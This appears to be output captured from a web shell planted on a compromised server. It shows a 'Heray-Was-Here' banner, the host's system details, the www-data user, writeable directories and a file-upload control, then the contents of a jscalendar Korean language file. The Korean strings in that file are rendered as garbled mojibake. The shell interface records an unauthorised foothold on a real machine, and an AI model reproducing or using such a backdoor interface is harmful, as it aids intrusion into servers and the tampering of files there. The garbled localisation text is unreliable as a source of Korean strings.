Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/abricot/includes/js/jscalendar-1.0/lang/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/abricot/includes/js/jscalendar-1.0/lang/calendar-ko-utf8.js
// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Translation: Yourim Yi <yyi@yourim.net>
// Encoding: EUC-KR
// lang : ko
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 if possible.  We strongly believe that
// Unicode is the answer to a real internationalized world.  Also please
// include your contact information in the header, as can be seen above.

// full day names

Calendar._DN = new Array
("μΌμš”μΌ",
 "μ›”μš”μΌ",
 "ν™”μš”μΌ",
 "μˆ˜μš”μΌ",
 "λͺ©μš”일",
 "κΈˆμš”μΌ",
 "ν† μš”μΌ",
 "μΌμš”μΌ");

// Please note that the following array of short day names (and the same goes
// for short month names, _SMN) isn't absolutely necessary.  We give it here
// for exemplification on how one can customize the short day names, but if
// they are simply the first N letters of the full name you can simply say:
//
//   Calendar._SDN_len = N; // short day name length
//   Calendar._SMN_len = N; // short month name length
//
// If N = 3 then this is not needed either since we assume a value of 3 if not
// present, to be compatible with translation files that were written before
// this feature.

// short day names
Calendar._SDN = new Array
("일",
 "μ›”",
 "ν™”",
 "수",
 "λͺ©",
 "금",
 "ν† ",
 "일");

// full month names
Calendar._MN = new Array
("1μ›”",
 "2μ›”",
 "3μ›”",
 "4μ›”",
 "5μ›”",
 "6μ›”",
 "7μ›”",
 "8μ›”",
 "9μ›”",
 "10μ›”",
 "11μ›”",
 "12μ›”");

// short month names
Calendar._SMN = new Array
("1",
 "2",
 "3",
 "4",
 "5",
 "6",
 "7",
 "8",
 "9",
 "10",
 "11",
 "12");

// tooltips
Calendar._TT = {};
Calendar._TT["INFO"] = "calendar 에 λŒ€ν•΄μ„œ";

Calendar._TT["ABOUT"] =
"DHTML Date/Time Selector\n" +
"(c) dynarch.com 2002-2005 / Author: Mihai Bazon\n" + // don't translate this this ;-)
"\n"+
"μ΅œμ‹  버전을 λ°›μœΌμ‹œλ €λ©΄ http://www.dynarch.com/projects/calendar/ 에 λ°©λ¬Έν•˜μ„Έμš”\n" +
"\n"+
"GNU LGPL λΌμ΄μ„ΌμŠ€λ‘œ λ°°ν¬λ©λ‹ˆλ‹€. \n"+
"λΌμ΄μ„ΌμŠ€μ— λŒ€ν•œ μžμ„Έν•œ λ‚΄μš©μ€ http://gnu.org/licenses/lgpl.html 을 μ½μœΌμ„Έμš”." +
"\n\n" +
"λ‚ μ§œ 선택:\n" +
"- 연도λ₯Ό μ„ νƒν•˜λ €λ©΄ \xab, \xbb λ²„νŠΌμ„ μ‚¬μš©ν•©λ‹ˆλ‹€\n" +
"- 달을 μ„ νƒν•˜λ €λ©΄ " + String.fromCharCode(0x2039) + ", " + String.fromCharCode(0x203a) + " λ²„νŠΌμ„ λˆ„λ₯΄μ„Έμš”\n" +
"- 계속 λˆ„λ₯΄κ³  있으면 μœ„ 값듀을 λΉ λ₯΄κ²Œ μ„ νƒν•˜μ‹€ 수 μžˆμŠ΅λ‹ˆλ‹€.";
Calendar._TT["ABOUT_TIME"] = "\n\n" +
"μ‹œκ°„ 선택:\n" +
"- 마우슀둜 λˆ„λ₯΄λ©΄ μ‹œκ°„μ΄ μ¦κ°€ν•©λ‹ˆλ‹€\n" +
"- Shift 킀와 ν•¨κ»˜ λˆ„λ₯΄λ©΄ κ°μ†Œν•©λ‹ˆλ‹€\n" +
"- λˆ„λ₯Έ μƒνƒœμ—μ„œ 마우슀λ₯Ό 움직이면 μ’€ 더 λΉ λ₯΄κ²Œ 값이 λ³€ν•©λ‹ˆλ‹€.\n";

Calendar._TT["PREV_YEAR"] = "μ§€λ‚œ ν•΄ (길게 λˆ„λ₯΄λ©΄ λͺ©λ‘)";
Calendar._TT["PREV_MONTH"] = "μ§€λ‚œ 달 (길게 λˆ„λ₯΄λ©΄ λͺ©λ‘)";
Calendar._TT["GO_TODAY"] = "였늘 λ‚ μ§œλ‘œ";
Calendar._TT["NEXT_MONTH"] = "λ‹€μŒ 달 (길게 λˆ„λ₯΄λ©΄ λͺ©λ‘)";
Calendar._TT["NEXT_YEAR"] = "λ‹€μŒ ν•΄ (길게 λˆ„λ₯΄λ©΄ λͺ©λ‘)";
Calendar._TT["SEL_DATE"] = "λ‚ μ§œλ₯Ό μ„ νƒν•˜μ„Έμš”";
Calendar._TT["DRAG_TO_MOVE"] = "마우슀 λ“œλž˜κ·Έλ‘œ 이동 ν•˜μ„Έμš”";
Calendar._TT["PART_TODAY"] = " (였늘)";
Calendar._TT["MON_FIRST"] = "μ›”μš”μΌμ„ ν•œ 주의 μ‹œμž‘ μš”μΌλ‘œ";
Calendar._TT["SUN_FIRST"] = "μΌμš”μΌμ„ ν•œ 주의 μ‹œμž‘ μš”μΌλ‘œ";
Calendar._TT["CLOSE"] = "λ‹«κΈ°";
Calendar._TT["TODAY"] = "였늘";
Calendar._TT["TIME_PART"] = "(Shift-)클릭 λ˜λŠ” λ“œλž˜κ·Έ ν•˜μ„Έμš”";

// date formats
Calendar._TT["DEF_DATE_FORMAT"] = "%Y-%m-%d";
Calendar._TT["TT_DATE_FORMAT"] = "%b/%e [%a]";

Calendar._TT["WK"] = "μ£Ό";

Hry